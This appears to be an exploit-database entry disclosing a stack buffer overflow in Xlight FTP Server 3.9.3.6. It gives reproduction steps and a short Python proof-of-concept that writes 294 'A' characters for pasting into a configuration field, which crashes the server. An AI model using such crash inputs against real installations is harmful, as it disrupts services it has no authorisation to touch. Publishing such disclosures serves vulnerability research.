Xlight FTP Server 3.9.3.6 Stack Buffer Overflow

2023.08.05
Credit: Yehia Elghaly
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

# Exploit Title: Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS) # Discovered by: Yehia Elghaly # Discovered Date: 2023-08-04 # Vendor Homepage: https://www.xlightftpd.com/ # Software Link : https://www.xlightftpd.com/download/setup.exe # Tested Version: 3.9.3.6 # Vulnerability Type: Buffer Overflow Local # Tested on OS: Windows XP Professional SP3 - Windows 11 x64 # Description: Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC) # Steps to reproduce: # 1. - Download and Xlight FTP Server # 2. - Run the python script and it will create exploit.txt file. # 3. - Open Xlight FTP Server 3.9.3.6 # 4. - "File and Directory - Modify Virtual Server Configuration - Advanced - Misc- Setup # 6. - Execute a Program after use logged in- Paste the characters # 7 - Crashed #!/usr/bin/env python3 exploit = 'A' * 294 try: with open("exploit.txt","w") as file: file.write(exploit) print("POC is created") except: print("POC not created")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top